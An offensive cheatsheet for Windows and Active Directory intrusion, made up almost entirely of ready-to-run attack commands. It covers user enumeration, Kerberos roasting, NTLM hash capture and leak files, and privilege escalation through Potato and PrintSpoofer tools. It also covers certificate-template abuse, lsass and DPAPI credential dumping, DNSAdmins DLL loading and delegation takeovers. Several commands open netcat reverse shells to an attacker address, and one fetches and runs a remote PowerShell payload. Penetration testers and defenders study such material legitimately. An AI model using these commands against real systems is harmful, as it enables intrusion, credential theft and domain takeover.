A cheatsheet in order to help during intrusion steps on Windows environment.
- Kerbrute
- Responder
- Impacket
- CrackMapExec
- PowerSploit
- PowerView
- Powermad
- Weirdhta
- Powercat
- Mimikatz
- Lsassy
- Rubeus -> Compiled Version
- Bloodhound
- Ldeep
- Ldapdomaindump
- WinPeas -> Compiled Version
- FullPower
- PrintSpoofer
- Potatoes
- Enum4linux
With Kerbrute:
kerbrute userenum --dc 10.10.10.10 -d <domain_name> users.txt -v
With Enum4linux:
./enum4linux.pl -v 10.10.10.10
This attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
With Impacket:
It is important to specify -no-pass in the script, otherwise a badpwdcount entry will be added to the user.
# For multiples users
GetNPUsers.py -request <domain_name>/
# For a single user
GetNPUsers.py -request -dc-ip 10.10.10.10 -no-pass <domain_name>/<user>
# For multiples users
GetNPUsers.py -request -dc-ip 10.10.10.10 -no-pass -usersfile users.txt <domain_name>/
With Rubeus:
# For multiples users
Rubeus.exe asreproast /domain:<domain_name> /format:<hashcat|john> /outfile:<filename>
# For a single user
Rubeus.exe asreproast /user:<user> /domain:<domain_name> /format:<hashcat|john> /outfile:<filename>
# For a spesific Organization Unit (OU)
Rubeus.exe asreproast /ou:<OU_name> /domain:<domain_name> /format:<hashcat|john> /outfile:<filename>
In an internal network you can abuse old protocol (like NBT-NS or LLMNR) and grab NetNTLMv2 hashes. You can then try to crack them with john or hashcat.
# As root
./Responder.py -I eth0 -wrb
When getting access to services, it might be possible to retrieve the NetNTLM hashes. This hash can be cracked or relayed (if signing is not enable on the protocol). There is multiples ways to leak this hash, such as:
/F (\\\\\\\\IP@80\\\\t)
///1.2.3.4@80/t
Target=file://1.2.3.4@80/t.dotx
URL
file://IP@80/t.htm
URL\=file://1.2.3.4@80/t.htm
\\\\1.2.3.4@80\\t.ico
rpcping -s 1.2.3.4 -e 1234 -a privacy -u NTLM
dir \\\\1.2.3.4@SSL@443\\DavWWWRoot\\test.exe
* net use \\\\1.2.3.4@80\\t
* net use * \\\\1.2.3.4@SSL@443\\folder\\subfolder password /user:userID
* net use * https://1.2.3.4:443/folder/subfolder password /user:userID
* net use * http://1.2.3.4/folder/subfolder password /user:root
* net use * \\\\1.2.3.4\\folder\\subfolder password /user:userID
* net use \\\\1.2.3.4@SSL@443\\DavWWWRoot\\test.exe \. (the DavWWWRoot triggers WebDAV forcibly )
* net use \\\\domain.site@80\\uri_folder\\index.html
* net use * https://1.2.3.4:443/folder/subfolder password /user:userID
* dir \\\\1.2.3.4@SSL@443\\DavWWWRoot\\test.exe
Create a new TXT file and paste the following:<br/>
[InternetShortcut] <br/>
URL=http://www.WeLoveResponder.com <br/>
IconIndex=0 <br/>
IconFile\=\\\\1.2.3.4\\L3\\3T.ico
Rename the file from .txt to .url
mkdir Folder <br/>
attrib +s Folder <br/>
cd Folder <br/>
echo [.ShellClassInfo] > desktop.ini <br/>
echo IconResource\=\\\\1.2.3.4\\aa >> desktop.ini <br/>
attrib +s +h desktop.ini
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" -Scan -ScanType 3 -File \\\\Server.domain\\file.txt
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -path \\\\Server.domain\\
Get Current Domain:
Get-NetDomain
Enum Other Domains:
Get-NetDomain -Domain <domain_name>
Get Domain SID:
Get-DomainSID
Get Domain Policy:
Get-DomainPolicy
Get Domain Controlers:
Get-NetDomainController
Get-NetDomainController -Domain <domain_name>
Enumerate Domain Users:
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
# Enumerate user logged on a machine
Get-NetLoggedon
Get-NetLoggedon -ComputerName <computer_name>
# Enumerate Session Information for a machine
Get-NetSession
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
# Enumerate Live machines
Get-NetComputer -Ping
Enumerate Shares:
# Enumerate Domain Shares
Find-DomainShare
# Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <computer_name>
Get-NetGPOGroup
# Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <computer_name>
Enum ACLs:
# Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
# Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <domain_name>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain Forest <forest_name>
# Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <forest_name>
# Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <forest_name>
User Hunting:
# Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
# Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
# Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
# Confirming admin access:
Invoke-UserHunter -CheckAccess
âť— Priv Esc to Domain Admin with User Hunting:
I have local admin access on a machine -> A Domain Admin has a session on that machine
-> I steal his credentials/token and impersonate him
With Powershell:
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup,LoggedOn
Invoke-BloodHound -IgnoreLdapCert -LdapUser <user> -LdapPass <password> -CollectionMethod All,GPOLocalGroup,LoggedOn
With Exe:
.\sh.exe --CollectionMethod All,GPOLocalGroup
# Get users
ldeep -s 10.10.10.10 -d <DOMAIN_FQDN> -u <user> -p <password> users
# Dump all LDAP, generating also .lst files
ldeep -s 10.10.10.10 -d <DOMAIN_FQDN> -u <user> -p <password> all ldap_dump/
With Impacket:
GetUserSPNs.py <domain_name>/<user>:<password>
GetUserSPNs.py <domain_name>/<user> -outputfile <filename> -hashes :<nt_hash>
With Powerview:
# List users with SPN
Get-NetUser -SPN
# Request TGS for every SPN
Invoke-Kerberoast
With Rubeus:
# Kerberoasting and outputing on a file with a specific format
Rubeus.exe kerberoast /domain:<domain_name> /outfile:<filename>
# Kerberoast specific user account
Rubeus.exe kerberoast /user:<user> /domain:<domain_name> /outfile:<filename> /simple
# Kerberoast by specifying credentials
Rubeus.exe kerberoast /creduser:<user> /credpassword:<password> /domain:<domain_name> /outfile:<filename>
Invoke-AllChecks
.\winpeas.exe cmd
Abuse some services executed as LOCAL SERVICE or NETWORK SERVICE in order to obtain SeAssignPrimaryToken and SeImpersonatePrivilege tokens.
.\fullpw.exe -c ".\nc.exe 10.10.10.150 443 -e powershell" -z
Powershell way:
[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseQuotaPrivilege", "SeShutdownPrivilege", "SeUndockPrivilege", "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege"
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\Windows\Temp\nc64.exe 10.10.10.150 443 -e powershell`""
Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask" -Principal $TaskPrincipal
Start-ScheduledTask -TaskName "SomeTask"
Escalate to SYSTEM.
The token SeImpersonatePrivilege is needed to escalate privileges.
.\pspoof.exe -c "C:\windows\temp\custom\nc.exe 10.10.10.150 443 -e powershell"
Like PrintSpoofer, the token SeImpersonatePrivilege is abused to escalate privileges.
# Using a CLSID, C:\tmp\root.bat contains a reverse shell
.\juicy.exe -t * -p C:\tmp\root.bat -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}" -l 9002
# Fileless reverse shell
.\juicy.exe -l 12345 -p C:\Window\System32\cmd.exe -t * -a "/c powershell.exe -nop -w hidden -executionpolicy bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.150/nishang.ps1')"
CLSID can be obtain here.
If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.
# Get members of the DNSAdmins group
net localgroup "DNSAdmins" /domain
# Load a malicious dll from a member of DNSAdmins context
# Stop service
sc.exe \\<DNS_SERVER> stop dns
# Replace the dll
dnscmd.exe /config /serverlevelplugindll \\10.10.10.150\share\evil.dll
# Restart the service
sc.exe \\<DNS_SERVER> start dns
If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
- Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
# Create a .txt file that will contain the shadow copy process script
Script ->{
set metadata c:\<PathToSave>metadata.cab
set context clientaccessible
set context persistent
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
}
- Next we need to access the shadow copy, we may have the
SeBackupPrivilegebut we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we can use this repo:
# Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
# Checking if the SeBackupPrivilege is enabled
Get-SeBackupPrivilege
# If it isn't we enable it
Set-SeBackupPrivilege
# Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
# Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hive
- Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
- Use secretsdump.py from impacket and dump the hashes.
- Use psexec or another tool of your choice to PTH and get Domain Admin access.
- Abusing Exchange one Api call from DA
- CVE-2020-0688
- PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
Windows
# find vulnerable templates
.\Certify.exe find /vulnerable
# find vulnerable templates for the current user
.\Certify.exe find /vulnerable /currentuser
# find templates with SAN enabled
.\Certify.exe find /enrolleeSuppliesSubject
Linux
certipy corp.local/user:password@10.10.10.10 find -vuln
Windows
# request a certificate with SAN
.\Certify.exe request /ca:corp.local\ca_name /template:template_name /altname:administrator
# convert pem to pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# pass the certificate with rubeus
.\Rubeus.exe asktgt /user:Administrator /password:pass /certificate:cert.pfx /ptt /nowrap
Linux
certipy corp.local/user:password@10.10.10.10 req -ca ca_name -template template_name -alt administrator
Make it vulnerable to ESC1!
Change the following attributes in the template.
mspki-enrollment-flag: Disable PEND_ALL_REQUESTS flag in order to request the template without Manager Approval.
In GUI, this attribute can be enabled by checking "CA manager approval" check box in "Issuance Requirements" tab.
mspki-ra-signature: Specify the number of Authorized Signatures to issue certificate.
In GUI, this attribute can be controlled by checking "This number of authorized signatures" check box in "Issuance Requirements" tab and setting the number.
mspki-certificate-name-flag: Enable ENROLLEE_SUPPLIES_SUBJECT flag in order to specify an arbitrary user account Subject Alternative Name (SAN) in certificate request.
In GUI, this attribute can be enabled by choosing "Supplly in the request" in "Subject Name" tab.
mspki-certificate-application-policy: Specify Certificate Application Policy Extension in order to validate the authentication.
In GUI, this attribute can be controlled by setting "Application Policies" in "Extensions" tab. It takes precedence over pkiextendedkeyusage and mspki-ra-application-policies.
pkiextendedkeyusage: Specify Extended Key Usage (EKU).
Client Authentication 1.3.6.1.5.5.7.3.2
Smart Card Logon 1.3.6.1.4.1.311.20.2.2
PKINIT Client Authentication 1.3.6.1.5.2.3.4
Any Purpose 2.5.29.37.0
No EKU
mspki-ra-application-policies: This attribute encapsulates embedded properties for multipurpose use.
In GUI, this attribute can be controlled by checking "This number of authorized signatures" check box in "Issuance Requirements" tab and choosing "Application Policy" menu. Certify.exe displays this attribute as Application Policies.
Add enrollments rights.
Certificate-Enrollment: The corresponding GUID is 0e10c968-78fb-11d2-90d4-00c04f79dc55.
Certificate-AutoEnrollment: The corresponding GUID is a05b8cc2-17bc-4802-a710-e7c15ab866a2.
Or yolo it with 00000000-0000-0000-0000-000000000000 (all extended rights)
Windows
# add enroll rights with PowerView
Add-DomainObjectAcl -TargetIdentity template_name -PrincipalIdentity controlled_user -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=corp,DC=local" -Verbose
# disable manager approval
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Identity template_name -XOR @{'mspki-enrollment-flag'=2} -Verbose
# disable signature requirements
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Identity template_name -Set @{'mspki-ra-signature'=0} -Verbose
# enable SAN attribute
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Identity template_name -XOR @{'mspki-certificate-name-flag'=1} -Verbose
# add authentication EKUs
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Identity template_name -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
# request certificate for administrator
.\Certify.exe request /ca:corp.local\ca_name /template:template_name /altname:administrator
# convert pem to pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# pass the certificate with rubeus
.\Rubeus.exe asktgt /user:Administrator /password:pass /certificate:cert.pfx /ptt /nowrap
Linux
Using modifyCertTemplate.py and certipy
# saved all previous attributes before modification
python3 modifyCertTemplate.py corp.local/user:password -template template_name
python3 modifyCertTemplate.py corp.local/user:password -template template_name get-acl
# disable manager approval
python3 modifyCertTemplate.py corp.local/user:password -template template_name -property mspki-enrollment-flag -value 2
# disable signature requirements
python3 modifyCertTemplate.py corp.local/user:password -template template_name -property mspki-ra-signature -value 0
# enable SAN attribute
python3 modifyCertTemplate.py corp.local/user:password -template template_name -property msPKI-Certificate-Name-Flag -add enrollee_supplies_subject
# add authentication EKUs
python3 modifyCertTemplate.py corp.local/user:password -template template_name -property mspki-certificate-application-policy -value "'1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2'"
# request certificate for administrator
certipy corp.local/user:password@10.10.10.10 req -ca ca_name -template template_name -alt administrator
# On the machine (AV might block it)
.\mimikatz.exe "sekurlsa::logonPasswords full" exit
# Locally from a minidump
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
lsassy -d <domain_name> -u <user> -p <password> -r -vv 10.10.10.10
lsassy -d <domain_name> -u <user> -p <password> -dc-ip 10.10.10.10 -r --procdump /path/to/procdump -vv 10.10.10.0/24
# Dump lsass memory (PID might bypass AVs)
.\procdump64.exe -accepteula -ma lsass.exe lsass
.\procdump64.exe -accepteula -ma <lsass_pid> lsass
# Parse the dump locally on windows (see above) or with pypykatz
pypykatz lsa minidump lsass.dmp
secretsdump.py <domain_name>/<user>:<password>@10.10.10.10
secretsdump.py <domain_name>/<user>@10.10.10.10 -hashes :<nt_hash>
# Locally
# Dump SYSTEM, SAM hives
reg save HKLM\SYSTEM \\10.10.10.150\share\SYSTEM
reg save HKLM\SYSTEM \\10.10.10.150\share\SAM
secretsdump.py -sam SAM -system SYSTEM local
From mimikatz github
# Check the details of the credential
.\mimikatz.exe "dpapi::cred /in:C:\Users\victim\AppData\Local\Microsoft\Credentials\12345678901234567890123456789012" exit
# Get victim security context (inject into user process or impersonnate with token)
# Decrypt the Masterkey using her password: Tip: if we are on a user's context using /rpc will auth with DC and will decrypt the masterkey!
.\mimikatz.exe "dpapi::masterkey /in:c:\Users\victim\AppData\Roaming\Microsoft\Protect\S-1-5-21-1313131313-8888888888-9999999999-1111\5f4b97cd-43aa-5e0f-26ab-fe63d801bbc4 /rpc" exit
Results: Masterkey:abcdef0123[...]4567890
SHA1 of masterkey:6b82b138e1a6b77f4c55a8df728288f56a3b6d5f
# Decrypt the credential
.\mimikatz.exe "token::elevate dpapi::cred /in:C:\Users\victim\AppData\Local\Microsoft\Credentials\12345678901234567890123456789012 /masterkey:6b82b138e1a6b77f4c55a8df728288f56a3b6d5f" exit
# There are many ways to do that, here is an example
crackmapexec smb hosts.list -u <user> -p <password> --shares --continue-on-success
# Enable Powershell Remoting on current Machine (need admin)
Enable-PSRemoting -force
# Create and enter into a new PSSession
$user = "DOMAIN\User" ;$s= "password";$ss = Convertto-securestring -string $s -AsPlainText -Force;$Credential = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $ss;
New-PSSession -Credential $Credential | Enter-PSSession
$user = "DOMAIN\User" ;$s= "password";$ss = Convertto-securestring -string $s -AsPlainText -Force;$Credential = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $ss;
Invoke-Command -ComputerName <target_computer> -Credential $Credential -ScriptBlock { whoami }
When we have admin rights on a machine with the TrustedForDelegation attribute we can abuse it in order elevate our privileges to domain admin.
Note: it can be used to compromise another forest if the 2 forests have bidirectional relations and TGTDelegation set to True (this can be checked with PowerShell Active Directory module and the command Get-ADTrust -Filter *|fl).
Goal: make a privileged user connect to our compromise machine.
# Monitoring incomings TGTs with rubeus:
.\rubeus.exe monitor /interval:2 /filteruser:DC01$
# Execute the printerbug to trigger the force authentication of the target DC to our machine (DC01 is compromised)
.\spoolsample.exe DC02.DOMAIN2.FQDN DC01.DOMAIN.FQDN
# Get the base64 captured TGT from Rubeus and inject it into memory:
.\rubeus.exe ptt /ticket:<base64_of_captured_ticket>
# Dump the hashes of the target domain using mimikatz:
.\mimikatz.exe "lsadump::dcsync /domain:DOMAIN2.FQDNM /user:DOMAIN2\Administrator" exit
When a user owns the msDS-AllowedToDelegateTo attribute, we can abuse constrained delegation for the mentioned service and adding alternate services we takeover the object.
.\rubeus.exe s4u /user:<target_user> /rc4:<rc4_hash> /impersonateuser:<target_user(Administrator)> /msdsspn:cifs/<target_machine.DOMAIN.FQDN> /altservice:ldap,http,wsman,host,winrm,krbtgt,cifs /ptt
# We can get command execution with Invoke-Command for example
$sess = New-PSSession -computername target_machine.DOMAIN.FQDN
Invoke-Command -session $sess -ScriptBlock {whoami}
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate a Domain Administrator.
# Use Powermad to create a new machine account
New-MachineAccount -MachineAccount <created_machine> -Password $(ConvertTo-SecureString '<machine_password>' -AsPlainText -Force) -Verbose
# Use PowerView and get the SID value of our new machine
$ComputerSid = Get-DomainComputer <created_machine> -Properties objectsid | Select -Expand objectsid
# Then by using the SID we have to build a ACE for the new created machine account
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over
Get-DomainComputer <target_machine> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
# Use rubeus to get the RC4 hash of the machine account
.\rubeus.exe hash /password:<machine_password>
# Or aes256
.\rubeus.exe hash /password:<machine_password> /domain:DOMAIN.FQDN /user:<created_machine$>
#extract the rc4_hmac/aes256_cts_hmac_sha1 value ==> <rc4_hash>
# Execute the impersonation and get a TGS as Domain Administrator for the service cifs on the DC
.\rubeus.exe s4u /user:<created_machine$> /rc4:<rc4_hash> /impersonateuser:<target_user(Administrator)> /msdsspn:cifs/<target_machine.DOMAIN.FQDN> /domain:DOMAIN.FQDN /ptt
# Get a session on the DC
.\psexec64.exe -accepteula \\<target_machine.DOMAIN.FQDN>\ -s powershell.exe
# Optional cleanup
# If msds-allowedtoactonbehalfofotheridentity field was empty before
Get-DomainComputer <target_machine> | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
Remove-ADComputer -Identity "<created_machine>"